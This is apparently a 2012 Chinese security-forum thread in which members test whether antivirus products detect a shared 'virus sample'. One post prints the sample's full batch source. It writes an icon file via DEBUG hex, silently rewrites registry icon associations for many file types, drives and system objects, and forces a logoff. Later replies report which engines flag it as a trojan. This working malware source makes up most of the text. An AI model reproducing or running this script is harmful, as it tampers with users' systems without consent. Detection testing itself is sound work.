一个老样本了过全部？（大家来测试）

显示全部楼层 · 发表于 2012-6-14 19:55:22

测试：必须运行测试

系统环境：XP系统

看看你的安全软件有无提示......

运行之后看看你的盘符里面的文件有无变化？

在线扫描结果：https://www.virustotal.com/file/86c69d04ad0ece9607978a8da7d658a42f95ce814a6803d427e32986d65f625b/analysis/1339674802/

显示全部楼层 · 发表于 2012-6-14 19:57:45

老样本？

完整路径: C:\Users\zmzcy\Desktop\1.exe
____________________________
____________________________
开发人员不可用
版本不可用
安装时间 2012/6/14 ( 19:56:26 )
上次使用时间不可用
启动项目否
____________________________
____________________________
未知
此程序的崩溃历史记录未知。
____________________________
极少用户信任的文件
诺顿社区中有不到 5 名用户使用了此文件。
____________________________
极新的文件
该文件已在不到 1 周前发行。
____________________________
未知
有关此文件的信息不足，无法推荐它。
____________________________
源文件:
winrar.exe

创建的文件:
1.exe
____________________________
文件指纹 - SHA:
86c69d04ad0ece9607978a8da7d658a42f95ce814a6803d427e32986d65f625b
____________________________
文件指纹 - MD5:
9e97da9b0b5a9c35517c7e6cb26d9f94
____________________________

显示全部楼层 · 发表于 2012-6-14 20:00:31

@echo off
@echo e 100 00 00 01 00 01 00 20 20 00 00 01 00 08 00 A8 08 >>bug
@echo e 110 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 >>bug
@echo e 120 00 00 01 00 08 00 00 00 00 00 00 04 00 00 00 00 >>bug
@echo e 130 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 >>bug
@echo e 140 00 00 AD AD AD 00 AB AB AB 00 A3 A3 A3 00 34 18 >>bug
@echo e 150 2B 00 37 B9 C6 00 BB FF FF 00 FA FB EB 00 F3 F7 >>bug
@echo e 160 F8 00 E6 F7 FF 00 57 D0 EA 00 A7 FB FF 00 E6 ED >>bug
@echo e 170 FF 00 BE EB EE 00 4A 7A 96 00 00 00 0E 00 FF FC >>bug
@echo e 180 F7 00 F3 FC FF 00 FD F1 FF 00 DD D1 D1 00 FB F8 >>bug
@echo e 190 F3 00 BE F7 FF 00 F5 F7 F7 00 57 C4 C2 00 8B 8B >>bug
@echo e 1A0 8B 00 60 B7 C1 00 4F DC DF 00 81 81 81 00 00 09 >>bug
@echo e 1B0 01 00 7F 7F 7F 00 59 5E 55 00 7D 7D 7D 00 C1 F7 >>bug
@echo e 1C0 FF 00 62 9E F2 00 44 4A C9 00 1B 68 7B 00 75 75 >>bug
@echo e 1D0 75 00 DE FA FB 00 D8 F7 FF 00 FF FF FB 00 03 07 >>bug
@echo e 1E0 01 00 F8 FF F4 00 E5 F6 FF 00 E0 DD DF 00 48 52 >>bug
@echo e 1F0 DB 00 E5 EC FF 00 5F 5F 5F 00 FF FF F8 00 5B 5B >>bug
@echo e 200 5B 00 F7 FC FA 00 57 5C 4D 00 EF F5 FC 00 D9 D9 >>bug
@echo e 210 E9 00 0E 03 06 00 4D 4D 4D 00 FE FE FE 00 FF FA >>bug
@echo e 220 FF 00 FF FF F5 00 FC FC FC 00 11 1A 10 00 49 49 >>bug
@echo e 230 49 00 FA FA FA 00 F8 F8 F8 00 4C 42 42 00 F6 F6 >>bug
@echo e 240 F6 00 43 43 43 00 F4 F4 F4 00 0D 0A 0C 00 EE EE >>bug
@echo e 250 EE 00 3B 3B 3B 00 EC EC EC 00 54 CC D8 00 39 39 >>bug
@echo e 260 39 00 06 00 05 00 4B 72 D5 00 37 37 37 00 01 02 >>bug
@echo e 270 00 00 E6 E6 E6 00 F0 FF F7 00 F7 F8 F4 00 33 33 >>bug
@echo e 280 33 00 E4 E4 E4 00 F0 FA ED 00 2F 2F 2F 00 2D 2D >>bug
@echo e 290 2D 00 2B 2B 2B 00 DC DC DC 00 29 29 29 00 DA DA >>bug
@echo e 2A0 DA 00 F8 FF FC 00 27 27 27 00 07 00 03 00 00 03 >>bug
@echo e 2B0 06 00 01 01 07 00 F6 FD FA 00 45 6C E0 00 F4 FB >>bug
@echo e 2C0 F8 00 D4 D4 D4 00 BC F9 FF 00 D2 D2 D2 00 1F 1F >>bug
@echo e 2D0 1F 00 ED F7 F1 00 E7 EF FF 00 1B 1B 1B 00 04 1A >>bug
@echo e 2E0 36 00 C6 C6 C6 00 13 13 13 00 00 01 03 00 F2 FF >>bug
@echo e 2F0 F3 00 BD F7 FD 00 EA F5 FF 00 0D 0D 0D 00 31 28 >>bug
@echo e 300 35 00 0B 0B 0B 00 BC BC BC 00 EC F7 ED 00 81 BE >>bug
@echo e 310 C0 00 09 09 09 00 07 07 07 00 FF FD FD 00 05 05 >>bug
@echo e 320 05 00 B6 B6 B6 00 3E BD C6 00 03 03 03 00 C2 FF >>bug
@echo e 330 FF 00 00 03 00 00 00 01 00 00 0F 12 16 00 B0 B0 >>bug
@echo e 340 B0 00 97 ED FF 00 62 DA DA 00 AE AE AE 00 6F E3 >>bug
@echo e 350 EE 00 A8 A8 A8 00 4B B8 C6 00 E5 F6 ED 00 05 03 >>bug
@echo e 360 02 00 FD FC EE 00 7B E1 F7 00 F9 F5 F4 00 B0 AE >>bug
@echo e 370 AD 00 F0 F3 FF 00 B8 F8 FC 00 92 92 92 00 FC FF >>bug
@echo e 380 F4 00 F3 FF FF 00 90 90 90 00 00 00 04 00 F3 F3 >>bug
@echo e 390 FF 00 F4 FF EC 00 8A 8A 8A 00 6A 63 66 00 B4 F9 >>bug
@echo e 3A0 FF 00 6E E0 F1 00 82 82 82 00 FF FF F4 00 80 80 >>bug
@echo e 3B0 80 00 FE F6 FD 00 FF FB F4 00 F6 F9 FF 00 42 7C >>bug
@echo e 3C0 CE 00 00 00 01 00 F9 F6 F8 00 F7 F8 F6 00 EC FA >>bug
@echo e 3D0 FF 00 76 76 76 00 E1 F3 FE 00 54 CD E1 00 70 70 >>bug
@echo e 3E0 70 00 FF FE FB 00 00 05 08 00 6E 6E 6E 00 02 00 >>bug
@echo e 3F0 00 00 EF F6 FF 00 68 68 68 00 FA F0 F6 00 66 66 >>bug
@echo e 400 66 00 64 64 64 00 17 33 3E 00 FC FB FF 00 FF FF >>bug
@echo e 410 EE 00 92 FB FF 00 05 00 00 00 E8 FF FF 00 57 A2 >>bug
@echo e 420 B2 00 6C 7F 84 00 56 56 56 00 54 54 54 00 52 52 >>bug
@echo e 430 52 00 EE F3 F1 00 F3 F0 EC 00 4E 4E 4E 00 FF FF >>bug
@echo e 440 FF 00 FF FB FF 00 4C 4C 4C 00 FD FD FD 00 8F 92 >>bug
@echo e 450 97 00 00 00 0C 00 FF F5 FF 00 FB FB FB 00 C8 F6 >>bug
@echo e 460 FD 00 F9 F9 F9 00 46 46 46 00 F7 F7 F7 00 F5 F5 >>bug
@echo e 470 F5 00 F3 F3 F3 00 00 0F 13 00 E1 F2 FF 00 3E 3E >>bug
@echo e 480 3E 00 FF FF FC 00 3A 3A 3A 00 D7 FB EB 00 E9 E9 >>bug
@echo e 490 E9 00 FB F9 F8 00 36 36 36 00 E7 E7 E7 00 34 34 >>bug
@echo e 4A0 34 00 E5 E5 E5 00 57 9E F9 00 32 32 32 00 30 30 >>bug
@echo e 4B0 30 00 DF DF DF 00 DB DB DB 00 FF FF F9 00 0E 00 >>bug
@echo e 4C0 00 00 C1 DE F3 00 7D 7E 82 00 26 26 26 00 F8 FB >>bug
@echo e 4D0 F2 00 91 F4 FF 00 D1 D1 D1 00 E0 F8 F8 00 7F 86 >>bug
@echo e 4E0 81 00 C9 C9 C9 00 16 16 16 00 FD FF F4 00 00 02 >>bug
@echo e 4F0 03 00 00 00 03 00 12 12 12 00 0E 0E 0E 00 BD BD >>bug
@echo e 500 BD 00 0A 0A 0A 00 57 B0 CB 00 6B AC F0 00 06 06 >>bug
@echo e 510 06 00 B7 B7 B7 00 00 0C 00 00 04 04 04 00 B5 B5 >>bug
@echo e 520 B5 00 F7 FD FF 00 85 E6 F0 00 55 CB D0 00 02 02 >>bug
@echo e 530 02 00 00 04 00 00 00 02 00 00 86 97 8C 00 1F 00 >>bug
@echo e 540 00 00 00 00 00 00 00 00 6F C0 C0 C0 C0 C0 C0 37 >>bug
@echo e 550 37 C0 53 67 7B 00 00 00 00 00 00 75 D6 C0 7B 6F >>bug
@echo e 560 78 00 00 00 00 76 00 76 00 A5 C0 C0 C0 C0 C0 C0 >>bug
@echo e 570 3D 37 FC 58 78 00 00 00 00 F1 00 00 00 CB 3A 9A >>bug
@echo e 580 3C 00 00 00 00 78 00 00 00 C0 C0 CC 56 61 E6 E6 >>bug
@echo e 590 40 C0 CA 3C 78 00 00 00 00 00 FC 48 C0 3A C0 C0 >>bug
@echo e 5A0 F1 00 00 00 7B FC 00 78 3C F8 F0 69 E9 E9 F5 69 >>bug
@echo e 5B0 69 F0 85 BF 00 FC 00 00 00 7B 00 C0 C0 C0 37 61 >>bug
@echo e 5C0 76 00 EA 7B 00 24 69 E6 61 DD D4 44 44 CD 44 D4 >>bug
@echo e 5D0 4D 61 E9 F0 F0 79 BC 00 00 00 00 D0 3A C0 C0 BB >>bug
@echo e 5E0 92 F7 00 DB 72 E9 51 D4 40 3A C0 37 C0 C0 37 C0 >>bug
@echo e 5F0 C0 3D CB 51 58 F0 02 F8 F7 7B 7B EE C0 C0 3D 30 >>bug
@echo e 600 8F EE 5A 69 DD DD C7 C0 C0 C0 37 C0 C0 C0 C0 37 >>bug
@echo e 610 37 37 CB 37 44 DD 03 02 72 FC FC EF 3A C0 C3 58 >>bug
@echo e 620 00 54 69 E9 46 37 C0 42 C0 C0 C0 C3 C3 C3 C3 C0 >>bug
@echo e 630 C0 C0 C0 37 3A 40 46 E9 F8 83 00 1F CC C0 C0 C7 >>bug
@echo e 640 46 F0 63 DD C9 C0 C9 3D 37 C3 3E CB CB CB CB 40 >>bug
@echo e 650 3E C7 C0 C0 3A 3A C3 D9 E9 72 85 42 3E C0 C0 C0 >>bug
@echo e 660 61 72 56 3E 03 03 F5 C0 C7 42 3E 40 40 40 40 C9 >>bug
@echo e 670 C9 C9 42 C0 51 69 F0 D4 46 E6 CA 3A 37 C0 C0 37 >>bug
@echo e 680 E6 DD EE 00 00 00 F7 00 EE 00 85 BF D0 5A E3 D6 >>bug
@echo e 690 BC 57 A1 00 00 FC F1 FC 00 56 36 C0 C0 C0 3A 37 >>bug
@echo e 6A0 CD 69 7B 00 F7 00 00 F7 F7 00 76 B1 51 92 96 F8 >>bug
@echo e 6B0 7B 78 00 00 F4 00 F7 76 00 A8 9A C0 C0 C0 CD C0 >>bug
@echo e 6C0 C0 58 75 00 78 00 00 00 41 AE BC 6F 00 40 78 00 >>bug
@echo e 6D0 75 FC 7B 00 76 00 6A 6F 78 CC C7 C0 40 C0 CB C3 >>bug
@echo e 6E0 CC 00 72 00 00 76 F7 00 00 D8 F0 69 AB EF EE 00 >>bug
@echo e 6F0 76 67 E3 F7 78 00 76 00 72 6A C0 C0 C0 C0 37 C0 >>bug
@echo e 700 AB 80 61 4D 3C 00 00 7B 00 00 00 00 75 00 D0 24 >>bug
@echo e 710 E9 E9 A5 DB 76 00 5A 72 85 85 EA 3D C3 C0 C0 B1 >>bug
@echo e 720 F0 51 D7 F0 7D A1 35 EA 7D F4 CE 0F C5 FA AA 0F >>bug
@echo e 730 C5 7D 7E 7B A1 00 67 E6 E6 72 85 EA 37 C0 DD 85 >>bug
@echo e 740 61 D8 EE 00 FE A1 35 A1 F6 75 68 19 E1 99 7C FA >>bug
@echo e 750 CE EA 7E 00 00 76 00 F4 F4 03 03 80 BF CB CA E9 >>bug
@echo e 760 D4 F5 63 63 61 E6 E9 E9 69 E6 0D F2 74 82 B8 FB >>bug
@echo e 770 B8 03 01 83 02 85 02 F5 83 A5 F5 03 67 C0 C2 D9 >>bug
@echo e 780 A8 00 FC 00 B6 EC 49 7E 1C A1 FA F2 CE 8A 0F 84 >>bug
@echo e 790 B2 43 B6 00 00 00 FC 7B 00 00 69 02 18 E6 8F 58 >>bug
@echo e 7A0 83 F7 00 7B 5B AA ED 4C FD 93 B5 0E CE 84 0F E5 >>bug
@echo e 7B0 23 35 AC 00 00 00 00 00 FC FC 56 F5 79 03 9C D7 >>bug
@echo e 7C0 C0 78 64 D0 43 6B 5C FE 28 93 99 68 7C 1A B2 FA >>bug
@echo e 7D0 B8 7D 7E 00 00 00 EA D6 00 BF 61 E9 72 01 BB CD >>bug
@echo e 7E0 3D C0 80 00 32 7F 5D F6 E0 C5 47 D3 20 0A 11 06 >>bug
@echo e 7F0 05 A1 88 FC 00 57 D0 D2 C0 C3 46 D9 A5 C0 41 CC >>bug
@echo e 800 40 C0 CD C0 2B C4 E2 FF 13 B7 86 25 15 A7 8D 8E >>bug
@echo e 810 7A 08 8C 9A 1B 80 44 C0 42 CB DD F0 54 C0 C0 24 >>bug
@echo e 820 40 C0 C0 C0 12 31 E4 33 A2 0D 19 2A 98 FB 94 6D >>bug
@echo e 830 82 65 D5 37 C3 C0 C0 C0 C0 CC 51 69 F8 C0 D9 EF >>bug
@echo e 840 CC C0 3D 3A 38 95 07 16 4E 62 74 91 0B 17 10 C8 >>bug
@echo e 850 8A 87 4F CB 3A C0 C0 37 C7 D4 C0 00 DE 3A FC 00 >>bug
@echo e 860 00 C0 C0 C0 77 29 9D 14 E7 21 E1 52 81 F2 B4 26 >>bug
@echo e 870 DA A4 A3 C9 C0 C0 C0 C7 CB 51 00 6F 76 C0 00 45 >>bug
@echo e 880 EA 6A C0 C0 D1 59 C6 8B A6 4A AD 60 F3 A0 89 09 >>bug
@echo e 890 5F 2D C7 37 C0 37 C0 37 4D F1 F4 D8 75 53 6F BA >>bug
@echo e 8A0 CA 71 DB 37 C0 3D 37 C0 C0 C0 CB 0C 22 2C 73 4F >>bug
@echo e 8B0 66 9B 27 CB C0 3E C0 C0 EE EF 55 36 4B E3 DC 18 >>bug
@echo e 8C0 AE 50 00 00 83 C0 42 C0 37 C0 C0 EB 6E CF 90 DF >>bug
@echo e 8D0 9F C1 A2 C0 C0 C3 85 EE 00 54 30 1F 48 63 69 02 >>bug
@echo e 8E0 1D AB 3C E3 00 78 57 85 3E C0 C3 39 2F 5E C0 27 >>bug
@echo e 8F0 DF C1 B3 C0 DC 00 F4 76 BC 2E 92 96 18 3D C0 CD >>bug
@echo e 900 B1 5A 67 00 B0 C0 CB C0 C0 C3 AB 70 3F 97 34 BE >>bug
@echo e 910 A9 E8 BD 37 3A C9 E6 00 F4 00 48 C0 C0 C0 C0 40 >>bug
@echo e 920 C0 3E C0 3A CB C0 3D C9 C0 3A C3 F9 9E AF B9 1E >>bug
@echo e 930 04 6C 3B C9 CB C0 C0 CD C0 C0 C0 37 C0 C0 00 00 >>bug
@echo e 940 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 950 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 960 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 970 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 980 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 990 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 9A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo e 9B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>bug
@echo rcx>>bug
@echo 8BE>>bug
@echo n tmp1>>bug
@echo w>>bug
@echo q>>bug
@debug<bug>nul
@Copy /b /y tmp1 0.ico>>nul
@copy /y 0.ico %windir%>nul
@del tmp*
@del bug*
@del 0.ico
@echo off
echo Windows Registry Editor Version 5.00 > temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}] >> temp.reg
echo @="紿腔萇齟" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}] >> temp.reg
echo @="紿腔恅紫" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}] >> temp.reg
echo @="紿腔邁懈" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}] >> temp.reg
echo @="紿眳諧" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo "Empty"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "Full"="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\Drive\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}] >> temp.reg
echo @="紿珩奻厙" >> temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\exefile\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\Audio.mp3] >> temp.reg
echo @="紿眳貉" >> temp.reg
echo [HKEY_CLASSES_ROOT\Audio.mp3\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\Audio.wma] >> temp.reg
echo @="紿眳秞恅璃" >> temp.reg
echo [HKEY_CLASSES_ROOT\Audio.wma\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\AVIFile\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\Excel.Addin\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\anifile] >> temp.reg
echo @="嫖梓" >> temp.reg
echo [HKEY_CLASSES_ROOT\anifile\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\txtfile\DefaultIcon] >> temp.reg
echo @="C:\\WINDOWS\\0.ico" >> temp.reg
echo [HKEY_CLASSES_ROOT\icofile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\Folder\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\batfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\cmdfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\dbfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\dllfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\inffile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\inifile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\curfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\WinRAR\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\regfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\wmafile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\pngfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\mpegfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\mp3file\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\giffile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\jpegfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\xmlfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_CLASSES_ROOT\WMVfile\DefaultIcon] >>temp.reg
echo @="C:\\WINDOWS\\0.ico" >>temp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons] >> temp.reg
echo "1"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "2"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "3"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "4"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "5"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "6"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "7"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "8"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "9"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "10"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "19"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "22"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "24"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "27"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "43"="C:\\WINDOWS\\0.ico" >> temp.reg
echo "44"="C:\\WINDOWS\\0.ico" >> temp.reg
echo 慾魂
echo Windows Registry Editor Version 5.00 > temp.reg
echo [HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics] >>temp.reg
echo "Shell Icon Size"="31" >>temp.reg
regedit /s temp.reg
del /q /f temp.reg>nul
logoff

显示全部楼层 · 发表于 2012-6-14 20:06:13

本帖最后由酱紫啊~ 于 2012-6-14 20:12 编辑

双击导致重启，nis2012miss

显示全部楼层 · 发表于 2012-6-14 20:06:48

ESET报了，没过全部啊。

显示全部楼层 · 发表于 2012-6-14 20:08:23

显示全部楼层 · 发表于 2012-6-14 20:09:16

现在毒霸已经查杀，关闭文件云测k+

另外这样本是受李白VS苏轼的启发改造的吧

显示全部楼层 · 发表于 2012-6-14 20:13:44

本帖最后由 humanlwj52 于 2012-6-14 20:18 编辑

ESET killed.

C:\Users\TOSHIBA\Desktop\1\1.exe > UPX v13_m14 > BAT2EXE > 1.bat - BAT/Agent.NHT 特洛伊木马

调用 cmd.exe 和 ntdvm.exe.
试图关机。

显示全部楼层 · 发表于 2012-6-14 20:19:36

本帖最后由龙而非. 于 2012-6-14 20:22 编辑

00315 发表于 2012-6-14 20:09
现在毒霸已经查杀，关闭文件云测k+

刚才的不杀吧哈哈你给毒霸云做贡献了你是第一个小白鼠吧呵呵

不过我弄好之后运行360主防就拦了......（现在360云貌似已经查杀了...）

显示全部楼层 · 发表于 2012-6-14 20:20:16

沉默游侠发表于 2012-6-14 20:06
ESET报了，没过全部啊。

发现你们都不仔细看帖子吧？

在线扫描结果：https://www.virustotal.com/file/86c69d04ad0ece9607978a8da7d658a42f95ce814a6803d427e32986d65f625b/analysis/1339674802/

[病毒样本] 一个老样本了过全部？（大家来测试）

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

[病毒样本] 一个老样本了 过全部？（大家来测试）

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

[病毒样本] 一个老样本了过全部？（大家来测试）